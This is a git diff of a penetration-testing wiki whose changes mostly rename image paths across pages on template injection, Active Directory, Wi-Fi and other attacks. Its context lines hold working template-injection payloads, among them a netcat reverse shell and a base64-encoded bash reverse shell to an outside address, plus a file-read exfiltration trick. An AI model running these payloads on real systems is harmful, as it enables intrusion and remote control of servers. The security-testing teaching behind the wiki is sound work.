||||
|
||||
![](<../.gitbook/assets/image (643) (1) (1).png>)
|
||||
![](<../.gitbook/assets/image (630) (1) (1).png>)
|
||||
|
||||
### Response Splitting
|
||||
|
||||
|
|
|
@ -69,7 +69,7 @@ In order to **find event listeners** in the current page you can:
|
|||
* **Search** the JS code for `window.addEventListener` and `$(window).on` (_JQuery version_)
|
||||
* **Execute** in the developer tools console: `getEventListeners(window)`
|
||||
|
||||
![](<../.gitbook/assets/image (618) (1) (1).png>)
|
||||
![](<../.gitbook/assets/image (618) (1).png>)
|
||||
|
||||
* **Go to** _Elements --> Event Listeners_ in the developer tools of the browser
|
||||
|
||||
|
|
|
@ -8,7 +8,7 @@
|
|||
|
||||
## Attacks Graphic
|
||||
|
||||
![](<../../.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (2) (1) (1) (1) (3).png>)
|
||||
![](<../../.gitbook/assets/image (535) (1) (1) (2) (2) (2) (2) (2) (2) (1) (1) (3).png>)
|
||||
|
||||
## Tool
|
||||
|
||||
|
|
|
@ -260,6 +260,7 @@ New version of Pebble :
|
|||
{% set cmd = 'id' %}
|
||||
{% endraw %}
|
||||
|
||||
|
||||
{% set bytes = (1).TYPE
|
||||
.forName('java.lang.Runtime')
|
||||
.methods[6]
|
||||
|
@ -327,6 +328,7 @@ Search for "com.hubspot.content.hubl.context.TemplateContextRequest" and discove
|
|||
//output: com.hubspot.jinjava.JinjavaConfig@78a56797
|
||||
|
||||
//It was also possible to call methods on the created object by combining the
|
||||
|
||||
{% raw %}
|
||||
{% %} and {{ }} blocks
|
||||
{% set ji='a'.getClass().forName('com.hubspot.jinjava.Jinjava').newInstance().newInterpreter() %}
|
||||
|
@ -606,6 +608,7 @@ Check out the following page to learn tricks about **arbitrary command execution
|
|||
{% import foobar %} = Error
|
||||
{% import os %}
|
||||
{% endraw %}
|
||||
|
||||
{{os.system('whoami')}}
|
||||
```
|
||||
|
||||
|
@ -633,6 +636,7 @@ Check out the following page to learn tricks about **arbitrary command execution
|
|||
{% debug %}
|
||||
{% endraw %}
|
||||
|
||||
|
||||
{{settings.SECRET_KEY}}
|
||||
{{4*4}}[[5*5]]
|
||||
{{7*'7'}} would result in 7777777
|
||||
|
@ -661,9 +665,11 @@ If the Debug Extension is enabled, a \`
|
|||
|
||||
```python
|
||||
<pre>
|
||||
|
||||
{% raw %}
|
||||
{% debug %}
|
||||
{% endraw %}
|
||||
|
||||
</pre>
|
||||
```
|
||||
|
||||
|
@ -743,6 +749,7 @@ More:
|
|||
()|attr('\x5f\x5fclass\x5f\x5f')|attr('\x5f\x5fbase\x5f\x5f')|attr('\x5f\x5fsubclasses\x5f\x5f')()[133]
|
||||
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <ip> <port> >/tmp/f')|attr('read')()}}
|
||||
|
||||
|
||||
{% raw %}
|
||||
{% with a = request["application"]["\x5f\x5fglobals\x5f\x5f"]["\x5f\x5fbuiltins\x5f\x5f"]["\x5f\x5fimport\x5f\x5f"]("os")["popen"]("echo -n YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40LzkwMDEgMD4mMQ== | base64 -d | bash")["read"]() %} a {% endwith %}
|
||||
{% endraw %}
|
||||
|
|
|
@ -72,11 +72,11 @@ Then, a malicious user could insert a different Unicode character equivalent to
|
|||
|
||||
You could use one of the following characters to trick the webapp and exploit a XSS:
|
||||
|
||||
![](<../.gitbook/assets/image (312) (1).png>)
|
||||
![](<../.gitbook/assets/image (312).png>)
|
||||
|
||||
Notice that for example the first Unicode character purposed can be sent as: `%e2%89%ae` or as `%u226e`
|
||||
|
||||
![](<../.gitbook/assets/image (215) (1).png>)
|
||||
![](<../.gitbook/assets/image (215) (1) (1).png>)
|
||||
|
||||
## References
|
||||
|
||||
|
|
|
@ -85,7 +85,7 @@ Some **examples**:
|
|||
|
||||
## WAF bypass encoding image
|
||||
|
||||
![from https://twitter.com/hackerscrolls/status/1273254212546281473?s=21](../../.gitbook/assets/eaubb2ex0aerank.jpg)
|
||||
![from https://twitter.com/hackerscrolls/status/1273254212546281473?s=21](../../.gitbook/assets/EauBb2EX0AERaNK.jpg)
|
||||
|
||||
## Injecting inside raw HTML
|
||||
|
||||
|
|
|
@ -83,7 +83,7 @@ grep "auth.*true" /opt/bitnami/mongodb/mongodb.conf | grep -v "^#\|noauth" #Not
|
|||
|
||||
Mongo Object IDs are **12-byte hexadecimal** strings:
|
||||
|
||||
![](../.gitbook/assets/id-and-objectids-in-mongodb.png)
|
||||
![](../.gitbook/assets/id-and-ObjectIds-in-MongoDB.png)
|
||||
|
||||
For example, here’s how we can dissect an actual Object ID returned by an application: 5f2459ac9fa6dc2500314019
|
||||
|
||||
|
|
|
@ -124,7 +124,7 @@ Once administrative access to the BMC is obtained, there are a number of methods
|
|||
|
||||
![](https://blog.rapid7.com/content/images/post-images/27966/ipmi\_boot.png)
|
||||
|
||||
![](<../.gitbook/assets/image (202) (1).png>)
|
||||
![](<../.gitbook/assets/image (202) (2).png>)
|
||||
|
||||
## Exploiting the BMC from the Host
|
||||
|
||||
|
|
|
@ -22,7 +22,7 @@
|
|||
* **Service**: Each pod has 1 internal **IP address** from the internal range of the node. However, it can be also exposed via a service. The **service has also an IP address** and its goal is to maintain the communication between pods so if one dies the **new replacement** (with a different internal IP) **will be accessible** exposed in the **same IP of the service**. It can be configured as internal or external. The service also actuates as a **load balancer when 2 pods are connected** to the same service.\
|
||||
When a **service** is **created** you can find the endpoints of each service running `kubectl get endpoints`
|
||||
|
||||
![](<../../.gitbook/assets/image (467).png>)
|
||||
![](<../../.gitbook/assets/image (467) (1).png>)
|
||||
|
||||
* **Kubelet**: Primary node agent. The component that establishes communication between node and kubectl, and only can run pods (through API server). The kubelet doesn’t manage containers that were not created by Kubernetes.
|
||||
* **Kube-proxy**: is the service in charge of the communications (services) between the apiserver and the node. The base is an IPtables for nodes. Most experienced users could install other kube-proxies from other vendors.
|
||||
|
@ -146,7 +146,7 @@ kubectl apply -f deployment.yml
|
|||
Each configuration file has 3 parts: **metadata**, **specification** (what need to be launch), **status** (desired state).\
|
||||
Inside the specification of the deployment configuration file you can find the template defined with a new configuration structure defining the image to run:
|
||||
|
||||
![](<../../.gitbook/assets/image (458) (1) (1) (1).png>)
|
||||
![](<../../.gitbook/assets/image (458) (1) (1).png>)
|
||||
|
||||
#### Example of Deployment + Service declared in the same configuration file (from [here](https://gitlab.com/nanuchi/youtube-tutorial-series/-/blob/master/demo-kubernetes-components/mongo.yaml))
|
||||
|
||||
|
@ -352,7 +352,7 @@ helm search <keyword>
|
|||
|
||||
Helm is also a template engine that allows to generate config files with variables:
|
||||
|
||||
![](<../../.gitbook/assets/image (465) (1).png>)
|
||||
![](<../../.gitbook/assets/image (462).png>)
|
||||
|
||||
## Kubernetes secrets
|
||||
|
||||
|
|
|
@ -123,7 +123,7 @@ Responder is going to **impersonate all the service using the mentioned protocol
|
|||
|
||||
It is possible to try to downgrade to NetNTLMv1 or to try to disable ESS.
|
||||
|
||||
![](<../../.gitbook/assets/poison (1) (1) (1).jpg>)
|
||||
![](<../../.gitbook/assets/poison (1) (1).jpg>)
|
||||
|
||||
## Inveigh
|
||||
|
||||
|
@ -161,7 +161,7 @@ If you want to use **MultiRelay**, go to _**/usr/share/responder/tools**_ and ex
|
|||
python MultiRelay.py -t <IP target> -u ALL #If "ALL" then all users are relayed
|
||||
```
|
||||
|
||||
![](<../../.gitbook/assets/image (209).png>)
|
||||
![](<../../.gitbook/assets/image (209) (1).png>)
|
||||
|
||||
### Post-Exploitation (MultiRelay)
|
||||
|
||||
|
@ -191,7 +191,7 @@ To disable LLMNR in your domain for DNS clients, open gpedit.msc.\
|
|||
Navigate to Computer Configuration->Administrative Templates->Network->DNS client.\
|
||||
Locate the option “Turn off multicast name resolution” and click “policy setting”:
|
||||
|
||||
![](../../.gitbook/assets/1.jpg)
|
||||
![](<../../.gitbook/assets/1 (1).jpg>)
|
||||
|
||||
Once the new window opens, enable this option, press Apply and click OK:
|
||||
|
||||
|
|
|
@ -19,7 +19,7 @@ Scalar objects define a single object instance whereas tabular objects define mu
|
|||
**OIDs** stands for **O**bject **Id**entifiers. **OIDs uniquely identify managed objects in a MIB hierarchy**. This can be depicted as a tree, the levels of which are assigned by different organizations. Top level MIB object IDs (OIDs) belong to different standard organizations.\
|
||||
**Vendors define private branches including managed objects for their own products.**
|
||||
|
||||
![](../../.gitbook/assets/SNMP_OID_MIB_Tree.png)
|
||||
![](../../.gitbook/assets/snmp\_oid\_mib\_tree.png)
|
||||
|
||||
You can **navigate** through an **OID tree** from the web here: [http://www.oid-info.com/cgi-bin/display?tree=#focus](http://www.oid-info.com/cgi-bin/display?tree=#focus) or **see what a OID means** (like `1.3.6.1.2.1.1`) accessing [http://oid-info.com/get/1.3.6.1.2.1.1](http://oid-info.com/get/1.3.6.1.2.1.1).\
|
||||
There are some **well-known OIDs** like the ones inside [1.3.6.1.2.1](http://oid-info.com/get/1.3.6.1.2.1) that references MIB-2 defined Simple Network Management Protocol (SNMP) variables. And from the **OIDs pending from this one** you can obtain some interesting host data (system data, network data, processes data...)
|
||||
|
@ -69,7 +69,7 @@ There are 2 important versions of SNMP:
|
|||
As mentioned before, **in order to access the information saved on the MIB you need to know the community string on versions 1 and 2/2c and the credentials on version 3.**\
|
||||
The are **2 types of community strings**:
|
||||
|
||||
* **`public`** mainly **read only** functions
|
||||
* **`public`** mainly **read only** functions 
|
||||
* **`private`** **Read/Write** in general
|
||||
|
||||
Note that **the writability of an OID depends on the community string used**, so **even** if you find that "**public**" is being used, you could be able to **write some values.** Also, there **may** exist objects which are **always "Read Only".**\
|
||||
|
@ -80,8 +80,8 @@ In versions 1 and 2/2c if you to use a **bad** community string the server wont
|
|||
## Ports
|
||||
|
||||
* The SNMP agent receives requests on UDP port **161**.
|
||||
* The manager receives notifications ([Traps](https://en.wikipedia.org/wiki/Simple_Network_Management_Protocol#Trap) and [InformRequests](https://en.wikipedia.org/wiki/Simple_Network_Management_Protocol#InformRequest)) on port **162**.
|
||||
* When used with [Transport Layer Security](https://en.wikipedia.org/wiki/Transport_Layer_Security) or [Datagram Transport Layer Security](https://en.wikipedia.org/wiki/Datagram_Transport_Layer_Security), requests are received on port **10161** and notifications are sent to port **10162**.
|
||||
* The manager receives notifications ([Traps](https://en.wikipedia.org/wiki/Simple\_Network\_Management\_Protocol#Trap) and [InformRequests](https://en.wikipedia.org/wiki/Simple\_Network\_Management\_Protocol#InformRequest)) on port **162**.
|
||||
* When used with [Transport Layer Security](https://en.wikipedia.org/wiki/Transport\_Layer\_Security) or [Datagram Transport Layer Security](https://en.wikipedia.org/wiki/Datagram\_Transport\_Layer\_Security), requests are received on port **10161** and notifications are sent to port **10162**.
|
||||
|
||||
## Brute-Force Community String (v1 and v2c)
|
||||
|
||||
|
|
|
@ -24,7 +24,7 @@ Accessing _/user/\<number>_ you can see the number of existing users, in this ca
|
|||
|
||||
![](<../../.gitbook/assets/image (257).png>)
|
||||
|
||||
![](<../../.gitbook/assets/image (227) (1) (1) (1).png>)
|
||||
![](<../../.gitbook/assets/image (227) (1) (1).png>)
|
||||
|
||||
## Hidden pages enumeration
|
||||
|
||||
|
@ -49,7 +49,7 @@ You need the **plugin php to be installed** (check it accessing to _/modules/php
|
|||
|
||||
Go to _Modules_ -> (**Check**) _PHP Filter_ -> _Save configuration_
|
||||
|
||||
![](<../../.gitbook/assets/image (252).png>)
|
||||
![](<../../.gitbook/assets/image (247) (1).png>)
|
||||
|
||||
Then click on _Add content_ -> Select _Basic Page_ or _Article -_> Write _php shellcode on the body_ -> Select _PHP code_ in _Text format_ -> Select _Preview_
|
||||
|
||||
|
|
|
@ -68,11 +68,11 @@ Now that we know which kind of information is saved inside the database, let's t
|
|||
|
||||
In the introspection you can find **which object you can directly query for** (because you cannot query an object just because it exists). In the following image you can see that the "_queryType_" is called "_Query_" and that one of the fields of the "_Query_" object is "_flags_", which is also a type of object. Therefore you can query the flag object.
|
||||
|
||||
![](../../.gitbook/assets/screenshot-from-2021-03-13-18-17-48.png)
|
||||
![](<../../.gitbook/assets/Screenshot from 2021-03-13 18-17-48.png>)
|
||||
|
||||
Note that the type of the query "_flags_" is "_Flags_", and this object is defined as below:
|
||||
|
||||
![](../../.gitbook/assets/screenshot-from-2021-03-13-18-22-57.png)
|
||||
![](<../../.gitbook/assets/Screenshot from 2021-03-13 18-22-57.png>)
|
||||
|
||||
You can see that the "_Flags_" objects are composed by **name** and .**value** Then you can get all the names and values of the flags with the query:
|
||||
|
||||
|
@ -195,7 +195,7 @@ Or even **relations of several different objects using aliases**:
|
|||
|
||||
In the **introspection** you can find the **declared** **mutations**. In the following image the "_MutationType_" is called "_Mutation_" and the "_Mutation_" object contains the names of the mutations (like "_addPerson_" in this case):
|
||||
|
||||
![](../../.gitbook/assets/screenshot-from-2021-03-13-18-26-27.png)
|
||||
![](<../../.gitbook/assets/Screenshot from 2021-03-13 18-26-27.png>)
|
||||
|
||||
For this example imagine a data base with **persons** identified by the email and the name and **movies** identified by the name and rating. A **person** can be **friend** with other **persons** and a person can **have movies**.
|
||||
|
||||
|
@ -255,7 +255,7 @@ Below you can find the simplest demonstration of an application authentication r
|
|||
|
||||
As we can see from the response screenshot, the first and the third requests returned _null_ and reflected the corresponding information in the _error_ section. The **second mutation had the correct authentication** data and the response has the correct authentication session token.
|
||||
|
||||
![](<../../.gitbook/assets/image (119) (1).png>)
|
||||
![](<../../.gitbook/assets/image (119) (2).png>)
|
||||
|
||||
## CSRF in GraphQL
|
||||
|
||||
|
|
|
@ -320,7 +320,7 @@ C:\xampp\tomcat\conf\server.xml
|
|||
|
||||
If you see an error like the following one:
|
||||
|
||||
![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (2) (1) (1) (1).png>)
|
||||
![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1).png>)
|
||||
|
||||
It means that the server **didn't receive the correct domain name** inside the Host header.\
|
||||
In order to access the web page you could take a look to the served **SSL Certificate** and maybe you can find the domain/subdomain name in there. If it isn't there you may need to **brute force VHosts** until you find the correct one.
|
||||
|
|
|
@ -161,7 +161,7 @@ This can be used to ask **thousands** of Wordpress **sites** to **access** one *
|
|||
</methodCall>
|
||||
```
|
||||
|
||||
![](../../.gitbook/assets/1\_jauyizf8zjdggb7ocszc-g.png)
|
||||
![](../../.gitbook/assets/1\_JaUYIZF8ZjDGGB7ocsZC-g.png)
|
||||
|
||||
If you get **faultCode** with a value **greater** then **0** (17), it means the port is open.
|
||||
|
||||
|
@ -187,7 +187,7 @@ It is recommended to disable Wp-Cron and create a real cronjob inside the host t
|
|||
</methodCall>
|
||||
```
|
||||
|
||||
![](<../../.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (1).png>)
|
||||
![](<../../.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (2) (1) (1) (1) (1).png>)
|
||||
|
||||
![](<../../.gitbook/assets/image (102).png>)
|
||||
|
||||
|
|
|
@ -42,6 +42,6 @@ If the nodeIntegration is set to true, a web page's JavaScript can use Node.js f
|
|||
|
||||
If contextIsolation set to false you can try to use \<webview> (similar to \<iframe> butcan load local files) to read local files and exfiltrate them: using something like **\<webview src=”file:///etc/passwd”>\</webview>:**
|
||||
|
||||
![](<../../.gitbook/assets/1 u1jdRYuWAEVwJmf_F2ttJg.png>)
|
||||
![](../../.gitbook/assets/1-u1jdryuwaevwjmf\_f2ttjg.png)
|
||||
|
||||
**(Trick copied form **[**here**](https://medium.com/@renwa/facebook-messenger-desktop-app-arbitrary-file-read-db2374550f6d)**).**
|
||||
**(Trick copied form** [**here**](https://medium.com/@renwa/facebook-messenger-desktop-app-arbitrary-file-read-db2374550f6d)**).**
|
||||
|
|
|
@ -264,7 +264,7 @@ Some really bad implementations allowed the Null PIN to connect (very weird also
|
|||
|
||||
All the proposed WPS attacks can be easily performed using _**airgeddon.**_
|
||||
|
||||
![](<../../.gitbook/assets/image (124).png>)
|
||||
![](<../../.gitbook/assets/image (201) (1).png>)
|
||||
|
||||
* 5 and 6 lets you try **your custom PIN** (if you have any)
|
||||
* 7 and 8 perform the **Pixie Dust attack**
|
||||
|
@ -352,7 +352,7 @@ _Note that as the client was deauthenticated it could try to connect to a differ
|
|||
|
||||
Once in the `airodump-ng` appears some handshake information this means that the handshake was captured and you can stop listening:
|
||||
|
||||
![](<../../.gitbook/assets/image (172) (1).png>)
|
||||
![](<../../.gitbook/assets/image (172) (1) (1).png>)
|
||||
|
||||
Once the handshake is captured you can **crack** it with `aircrack-ng`:
|
||||
|
||||
|
|
|
@ -10,7 +10,7 @@ If you ends in a code **using shift rights and lefts, xors and several arithmeti
|
|||
|
||||
If this function is used, you can find which **algorithm is being used** checking the value of the second parameter:
|
||||
|
||||
![](<../../.gitbook/assets/image (254) (1).png>)
|
||||
![](<../../.gitbook/assets/image (375).png>)
|
||||
|
||||
Check here the table of possible algorithms and their assigned values: [https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id](https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id)
|
||||
|
||||
|
@ -145,7 +145,7 @@ You can identify both of them checking the constants. Note that the sha\_init ha
|
|||
|
||||
Note the use of more constants
|
||||
|
||||
![](<../../.gitbook/assets/image (253) (1) (1).png>)
|
||||
![](<../../.gitbook/assets/image (253) (1) (1) (1).png>)
|
||||
|
||||
## CRC (hash)
|
||||
|
||||
|
@ -173,7 +173,7 @@ A CRC hash algorithm looks like:
|
|||
|
||||
The graph is quiet large:
|
||||
|
||||
![](<../../.gitbook/assets/image (207) (2).png>)
|
||||
![](<../../.gitbook/assets/image (207) (2) (1).png>)
|
||||
|
||||
Check **3 comparisons to recognise it**:
|
||||
|
||||
|
|
|
@ -55,7 +55,7 @@ DebuggableAttribute.DebuggingModes.EnableEditAndContinue)]
|
|||
|
||||
And click on **compile**:
|
||||
|
||||
![](<../../.gitbook/assets/image (314) (1).png>)
|
||||
![](<../../.gitbook/assets/image (314) (1) (1).png>)
|
||||
|
||||
Then save the new file on _**File >> Save module...**_:
|
||||
|
||||
|
|
|
@ -10,7 +10,7 @@ Active Directory objects such as users and groups are securable objects and DACL
|
|||
|
||||
An example of ACEs for the "Domain Admins" securable object can be seen here:
|
||||
|
||||
![](<../../.gitbook/assets/1 (1).png>)
|
||||
![](../../.gitbook/assets/1.png)
|
||||
|
||||
Some of the Active Directory object permissions and types that we as attackers are interested in:
|
||||
|
||||
|
|
|
@ -37,7 +37,7 @@ If you don't want to wait an hour you can use a PS script to make the restore ha
|
|||
|
||||
Note the spotless' user membership:
|
||||
|
||||
![](<../../.gitbook/assets/1 (2) (1).png>)
|
||||
![](<../../.gitbook/assets/1 (2) (1) (1).png>)
|
||||
|
||||
However, we can still add new users:
|
||||
|
||||
|
|
|
@ -61,7 +61,7 @@ Set-ADComputer $targetComputer -PrincipalsAllowedToDelegateToAccount FAKECOMPUTE
|
|||
Get-ADComputer $targetComputer -Properties PrincipalsAllowedToDelegateToAccount #Check that it worked
|
||||
```
|
||||
|
||||
![](../../.gitbook/assets/b2.png)
|
||||
![](../../.gitbook/assets/B2.png)
|
||||
|
||||
#### Using powerview
|
||||
|
||||
|
@ -105,7 +105,7 @@ rubeus.exe s4u /user:FAKECOMPUTER$ /aes256:<AES 256 hash> /impersonateuser:admin
|
|||
Note that users has an attribute called "**Cannot be delegated**". If a user has this attribute to True, you won't be able to impersonate him . This property can be seen inside bloodhound.
|
||||
{% endhint %}
|
||||
|
||||
![](../../.gitbook/assets/b3.png)
|
||||
![](../../.gitbook/assets/B3.png)
|
||||
|
||||
### Accessing
|
||||
|
||||
|
|
|
@ -8,7 +8,7 @@
|
|||
sekurlsa::wdigest
|
||||
```
|
||||
|
||||
This behaviour can be **deactivated/activated setting to 1** the value of _**UseLogonCredential**_ and _**Negotiate**_ in _**HKEY\_LOCAL\_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest**_.\
|
||||
This behaviour can be **deactivated/activated setting to 1** the value of _**UseLogonCredential**_ and _**Negotiate**_ in _**HKEY\_LOCAL\_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest**_.\
|
||||
If these registry keys **don't exist** or the value is **"0"**, then WDigest will be **deactivated**.
|
||||
|
||||
```
|
||||
|
@ -57,7 +57,7 @@ Using _Restricted Admin mode for RDP_, when you connect to a remote computer usi
|
|||
|
||||
Note that as your credentials are not being saved on the RDP session if **try to access network resources** your credentials won't be used. **The machine identity will be used instead**.
|
||||
|
||||
![](../../.gitbook/assets/RAM.png)
|
||||
![](../../.gitbook/assets/ram.png)
|
||||
|
||||
From [here](https://blog.ahasayen.com/restricted-admin-mode-for-rdp/).
|
||||
|
||||
|
|
|
@ -89,19 +89,19 @@ int main()
|
|||
|
||||
Below shows the named pipe server and named pipe client working as expected:
|
||||
|
||||
![](<../../.gitbook/assets/screenshot-from-2019-04-02-23-44-22 (2).png>)
|
||||
![](<../../.gitbook/assets/Screenshot from 2019-04-02 23-44-22.png>)
|
||||
|
||||
Worth nothing that the named pipes communication by default uses SMB protocol:
|
||||
|
||||
![](../../.gitbook/assets/screenshot-from-2019-04-04-23-51-48.png)
|
||||
![](<../../.gitbook/assets/Screenshot from 2019-04-04 23-51-48.png>)
|
||||
|
||||
Checking how the process maintains a handle to our named pipe `mantvydas-first-pipe`:
|
||||
|
||||
![](<../../.gitbook/assets/screenshot-from-2019-04-02-23-44-22 (1).png>)
|
||||
![](<../../.gitbook/assets/Screenshot from 2019-04-02 23-44-22 (1).png>)
|
||||
|
||||
Similary, we can see the client having an open handle to the named pipe:
|
||||
|
||||
![](../../.gitbook/assets/screenshot-from-2019-04-02-23-44-22.png)
|
||||
![](<../../.gitbook/assets/Screenshot from 2019-04-02 23-44-22 (2).png>)
|
||||
|
||||
We can even see our pipe with powershell:
|
||||
|
||||
|
@ -109,7 +109,7 @@ We can even see our pipe with powershell:
|
|||
((Get-ChildItem \\.\pipe\).name)[-1..-5]
|
||||
```
|
||||
|
||||
![](<../../.gitbook/assets/screenshot-from-2019-04-02-23-44-22 (3).png>)
|
||||
![](<../../.gitbook/assets/Screenshot from 2019-04-02 23-44-22 (3).png>)
|
||||
|
||||
## Token Impersonation
|
||||
|
||||
|
|